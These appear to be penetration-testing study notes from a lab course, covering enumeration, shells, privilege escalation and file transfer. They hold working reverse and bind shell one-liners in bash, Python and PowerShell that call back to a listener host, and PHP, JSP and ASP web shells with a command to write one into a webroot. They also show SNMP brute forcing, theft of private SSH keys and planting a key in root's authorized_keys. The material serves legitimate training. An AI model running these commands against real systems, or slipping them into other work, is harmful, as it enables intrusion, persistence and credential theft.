2. Getting Started

Risk Management

Data protection on policy without negatively affecting org

Identify: Legal, environmental, market, regulatory, etc...
Analyze: Determines impact, probability. Mapped to policies, procedures, processes
Evaluate: Org decides to accept unavoidable, avoid (change plans), control (mitigate) or transfer risk (insure)
Deal: Eliminate as possible. Interfacing with stakeholders
Monitor: Situational changes that could change impact, from low-medium-high impact

Handy Cmds:

netstat -rn // show accessible networks w/vpn

Kernel IP routing table
Destination     Gateway         Genmask         Flags   MSS Window  irtt Iface
0.0.0.0         192.168.1.2     0.0.0.0         UG        0 0          0 eth0
10.10.14.0      0.0.0.0         255.255.254.0   U         0 0          0 tun0
10.129.0.0      10.10.14.1      255.255.0.0     UG        0 0          0 tun0
192.168.1.0     0.0.0.0         255.255.255.0   U         0 0          0 eth0

Services

Server Message Block:

SMB allows users, admins to share folders, make them accessible
A tool that can enum with SMB shares is smbclient
-L Retrieve list of avail shares on remote host
-N Suppress passwd
get file.txt Download a file

Simple Network Management Protocol:

Community strings provide info, stats about router, device
Default strings of public and private often unchanged
SNMP versions 1, 2c: Access controlled using plaintext string
- If we know the name, we can gain access

Encryption/auth were added in SNMP v3

#smbclient
smbclient -N -L \\\\10.10.10.0 # list SMB shares
smbclient \\\\10.10.10.0\\users # connect to SMB share
smbclient --no-pass -L //10.10.10.1 # null user
smbclient -U 'user[%passwd]' -L [--pw-nt-hash] //10.10.10.1 # use NT hash
smbclient -U '%' -N \\\\10.10.10.1\\<SHARE> # null session to share

#snmpwalk
snmpwalk -v 2c -c public 10.10.10.1 1.3.6.1.2.1.1.5.0 # scan snmp on ip 
snmpget -V # what version is running locally?

#handy OID's to know
1.3.6.1.2.1.1.1.0 # system description
1.3.6.1.4.1.77.1.2.25 # win usrs
1.3.6.1.2.1.25.4.2.1.2 # running procs
1.3.6.1.2.1.2.2.1.2 # int name
1.3.6.1.2.1.6.13.1.3 # open tcp ports
1.3.6.1.2.1.25.6.3.1.2 # software
1.3.6.1.2.1.25.2.3.1.4 # storage units
1.3.6.1.2.1.4.35 # nat table
1.3.6.1.2.1.4.21 # ip route table
1.3.6.1.2.1.31.1.1.1 # wireless table

#other 
onesixtyone -c brute.txt 10.10.10.1 # brute force snmp secret
enum4linux -a # enum4linux scan

Tmux primer by ippsec

Vim Primer

Netcat: Win: netcat | Win alt: PowerCat socat Features nc doesn't have (fwding ports, connecting to serial devices)

Can also be used to upgrade a shell to a full TTY
Standaloin of socat: Can xfer to a system after RCE to get more stable revshell

Vim

Create new file: Input file name
Once open, read-only normal mode allows us to navigate/read file
To edit: Hit i to enter insert mode, shown by "-- INSERT --" at bottom
Once finished: Hit esc to get out of insert back into normal mode

We can multiply any cmd to run multiple times by adding a number before it

Example: 4yw would copy 4 words instead of one

Save a file/quit: Press: to go into command mode

Once we do, we will see any commands we type at the bottom of the vim window

#tmux
ctrl +b # default prefix
prefix c # new window
prefix 1 # swap to window 1
prefix + shift + % # split vertically
prefix + shift + " # split horizontally
prefix + -> # swap to right pane

#vim
esc + i # insert mode
esc # normal mode 
x # cut char
dw # cut word 
dd # cut line
yw # cp word
yy # cp line
p # paste
:1 # go to line 1
:w # write file 'save'
:q # quit
:q! # save/quit

nmap


#nmap
nmap -sV -sC -p- 10.10.10.0 # ver (V), script (sC), all ports (-p-)
locate scripts/critrix # list nmap scripts
ls /usr/share/nmap/scripts | snmp # also lists nmap scripts
nmap --script smb-os-discovery.nse -p 445 10.10.10.0 # run nse script 
nmap --script=banner -p 80 10.10.10.1 # banner grab

#example
nmap --script smb-os-discovery.nse -p445 10.10.10.40
Host script results:
| smb-os-discovery: 
|   OS: Windows 7 Professional 7601 Service Pack 1 (Windows 7 Professional 6.1)
|   OS CPE: cpe:/o:microsoft:windows_7::sp1:professional
|   Computer name: CEO-PC
|   NetBIOS computer name: CEO-PC\x00
|   Workgroup: WORKGROUP\x00
|_  System time: 2020-12-27T00:59:46+00:00

#netcat 
nc 10.10.10.1 # banner grab

sudo apt install seclists -y # install seclists

Web Enums

ffuf or GoBuster to perform dir enum
Additional functionality, such as enum public AWS S3 buckets

Add a DNS Server such as 1.1.1.1 to /etc/resolv.conf

EyeWitness/Aquatone can be used to take screens of targets, fingerprint, and id for default creds

Certificates: SSL/TLS certificates are another potentially valuable source of info if HTTPS is in use

Viewing cert reveals details: Programs like testssl.sh and sslscan are great for this
Email/company name could be used to conduct a phishing attack if in scope
robots.txt Common for sites to contain:
- Tells engines/crawlers like Googlebot which resources can/can't be accessed for indexing
- Can provide location of private files/admin pages
Source Code: Worth checking source code for any pages

#web enums
gobuster dir -u http://10.10.10.1 -w /usr/share/dirb/wordlists/common.txt #dir scan
gobuster dns -d site.com -w /usr/share/SecLists/Discovery/DNS/namelist.txt #subd 

feroxbuster -x php -u http://10.10.10.1 # look for php in search
dirsearch -u http://10.10.10.1

curl 10.10.10.1/robots.txt # check robots.txt
curl -IL https://www.website.com # banner grab

whatweb --no-errors 10.10.10.1 # web server/cert details
ctrl +U # view page source in browser

Virtual Machines

Hyper-V on Windows
Virtual machines on bare metal hypervisors such as Proxmox or VMware ESXi
Hypervisors: VirtualBox, or VMware Workstation Player on Windows/Linux
VMware Workstation, requires a paid license but offers many features Hypervisor: Allows us to create/run VMs: Enables us to use host to run VMs by virtually sharing mem/resources
Run isolated from primary OS, which offers isolation/protection

Folder Structure: Have clear folder structure on machine to save data

moo@htb[/htb]$ tree Projects/
Projects/
└── Acme Company
    ├── EPT (External Pentest)
    │   ├── evidence
    │   │   ├── credentials
    │   │   ├── data
    │   │   └── screenshots
    │   ├── logs
    │   ├── scans
    │   ├── scope
    │   └── tools

What's a shell?

A program that takes input from user and passes cmds to OS for tasks
bash was originally Unix's sh, and others like zsh, tcsh, ksh, etc.. exist

Shell Types

Initiates connection back to a listener on our attack box

Public Exploits

sudo apt install exploitdb -y
searchsploit openssh 7.2

Online exploit DBs to search for vulns: Exploit DB, Rapid7 DB, Vuln Lab

Metasploit Framework: Contains built-in exploits of public vulns

Recon scripts enum hosts, compromised targets
Verification scripts validate vulnerabilities without hacking it
Meterpreter -Connect to shells, run cmds on hacked targets
Post-exploit/pivot tools

msfconsole -q # start metasploit without banner
search exploit eternalblue # use number: search can apply filters 
cve:2009type:exploit
help search # shows all filters 
options # show module options
check # not every exploit supports this - checks if target vuln
run or exploit # start attempt

Reverse Shell Commands

Cmd we exec depends on OS a compromised host runs: What apps/cmds we can access

Payload All The Things: Comprehensive list of revshells we can use
Certain cmds are more reliable: Can be attempted to get a reverse connection

bash -c 'bash -i >& /dev/tcp/x.x/1234 0>&1'
rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.10.10 1234 >/tmp/f

powershell -nop -c "$client = New-Object System.Net.Sockets.TCPClient('10.10.10.10',1234);$s = $client.GetStream();[byte[]]$b = 0..65535|%{0};while(($i = $s.Read($b, 0, $b.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($b,0, $i);$sb = (iex $data 2>&1 | Out-String );$sb2 = $sb + 'PS ' + (pwd).Path + '> ';$sbt = ([text.encoding]::ASCII).GetBytes($sb2);$s.Write($sbt,0,$sbt.Length);$s.Flush()};$client.Close()"

Once cmd loses connection: Have to rerun exploit for access

Waits for us to connect, gives us control with nc ip addr 1234

Unlike a revshell that connects to us: we connect to it on the targets' listening port
Once we exec a bind shell cmd, it will start listening on a port on the remote host
- It will bind that host's shell, to that port
- We connect that port with nc, get control through a shell on that system

The following are reliable commands we can use to start a bind shell:

bash:

rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/bash -i 2>&1|nc -lvp 1234 >/tmp/f

python:

python -c 'exec("""import socket as s,subprocess as sp;s1=s.socket(s.AF_INET,s.SOCK_STREAM);s1.setsockopt(s.SOL_SOCKET,s.SO_REUSEADDR, 1);s1.bind(("0.0.0.0",1234));s1.listen(1);c,a=s1.accept();\nwhile True: d=c.recv(1024).decode();p=sp.Popen(d,shell=True,stdout=sp.PIPE,stderr=sp.PIPE,stdin=sp.PIPE);c.sendall(p.stdout.read()+p.stderr.read())""")'

powershell:

powershell -NoP -NonI -W Hidden -Exec Bypass -Command $listener = [System.Net.Sockets.TcpListener]1234; $listener.start();$client = $listener.AcceptTcpClient();$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + "PS " + (pwd).Path + " ";$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close();

Unlike revshells, if we drop a connection to a bind shell, we can connect back immediately
If the shell cmd stopped, or the remote host rebooted: Then we'd lose access

We can only type cmds/backspace when connected/can't move the cursor etc..

We can upgrade our TTY by mapping term TTY with remote one

python -c 'import pty; pty.spawn("/bin/bash")'
ctrl +z # background: get back on local term
stty raw -echo # raw mode: what's sent is exactly what's received
fg # foreground
echo $TERM # see terminal type
stty size # size for rows/columns
export TERM=xterm-256color # change term settings
stty rows 67 columns 318 # change row/column size settings

Accepts cmd via HTTP params like GET/POST execs, prints back: web scripts (PHP/ASP)

Web shell scripts typically 1-liners
Need to place our script into the remote host's web dir (webroot) to exec through browser

<?php system($_REQUEST["cmd"]); ?> #php

<% Runtime.getRuntime().exec(request.getParameter("cmd")); %> //jsp

<% eval request("cmd") %>  # asp

Uploading a Web Shell:

Need to place our script into the remote host's web dir (webroot) to exec through browser
Can be done with vuln in upload that allows us to write a shell to file (shell.php)
If we have RCE via exploit, we can write our shell directly to webroot for access over web
First: ID where webroot is

Default webroots:

/var/www/html # apache
/usr/local/nginx/html/ #nginx
c:\inetpub\wwwroot\ #iis
C:\xampp\htdocs\ #xampp

We can check dirs to see which webroot is in use

use echo to write out shell
- If we're attacking apache, we can write a php shell:
- echo '<?php system($_REQUEST["cmd"]); ?>' > /var/www/html/shell.php`

We can access our shell through a browser or curl

Visit shell.php page on site, and use ?cmd=id to execute id:

```
http://server_ip:port/shell.php?cmd=id 
```
we can also use curl

curl http://SERVER_IP:PORT/shell.php?cmd=id

Privilege Escalation

HackTricks, PayloadsAllTheThings, LinEnum, linuxprivchecker,
Win: Seatbelt, JAWS, PEASS || Noisy: Will trigger stuff

dkpg -l # see what software is installed
C:\Program Files # see what software is installed windows 
find / -perm -u=s -type f 2>/dev/null # find all perms with s
sudo -l # check what sudo privs we have

User Privileges

Allows a user to exec cmds as a diff user: Lower priv users to exec cmds as root without access

GTFOBins List of cmds/how they can be exploited through sudo
LOLBAS List of Win apps leverage, like downloading files/exec cmds

Scheduled Tasks

Cron jobs: Form of scheduling tasks with specific dirs we utilize to add jobs: Need right perms

1. /etc/crontab
2. /etc/cron.d
3. /var/spool/cron/crontabs/root

If we can write to a dir called by a cron job: should send us a shell when exec

Exposed Credentials Common config files, logs, user history (bash_history/PSReadLine in Win)

SSH Keys If we have read access over .ssh dir for a specific user

We might be able to read priv ssh keys in
- /home/user/.ssh/id_rsa or /root/.ssh/id_rsa and use that to log in
- If we can read the /root/.ssh/ dir, we can cp it to our machine using -i

cat /home/user/.ssh/id_rsa or cat /home/root.ssh/id_rsa
vim id_rsa
chmod 600 id_rsa # changes perms to be more restricetive: 
# lax perms means ssh server could prevent them from working  
ssh mootarget@10.10.10.10 -i id_rsa

If we see write access to a user/.ssh/ dir, can place our public key in the dir
SSH config won't accept keys written by other users, so works if we have control over them

cat /home/user/.ssh/authorized_keys 
ssh-keygen -f key # create new key, -f output file
# 2 files created 
1. key (we use this with ssh -i)
2. key.pub # we copy this to the remote machine
# cp key.pub onto the remote machine
# add it to /home/root/.ssh/authorized_keys

echo "ssh-rsa DSJDKLAAAAB...SNIP...M= user@parrot" >> /root/.ssh/authorized_keys
# echo typically achieves this and all we're doing here is appending it to the file
ssh root@10.10.10.1 -i key

Transferring Files Python HTTP server on our machine and wget/cURL to download files

cd /tmp # go into tmp
python3 -m http.server 8000 # start simple server

wget http://10.10.14.1:8000/linenum.sh # has to be in the same dir listed - dl
curl http://10.10.14.1:8000/linenum.sh -o linenum.sh # -o output file name
scp linenum.sh user@remotehost:/tmp/linenum.sh 
# specify local file w/scp, remote dir saved

Base64 base64 encode the file into b64, paste the str on the remote server, decod

base64 shell -w 0 # xsfer bin file shell, b64 encode it
f0VMRgIBAQAAAAAAAAAAAAIAPgABAAAA... <SNIP> ...lIuy9iaW4vc2gAU0iJ51JXSInmDwU

echo f0VMRgA... <SNIP> ...lIuy9iaW4vc2gAU0iJ51JXSInmDwU | base64 -d > shell
# copy b64 str, go to remote host: use b64 -d to decode and pip to file

file shell # validate file format
md5sum shell # check md5sums of both files

Previous1. Process Next3. NMAP

Last updated 8 months ago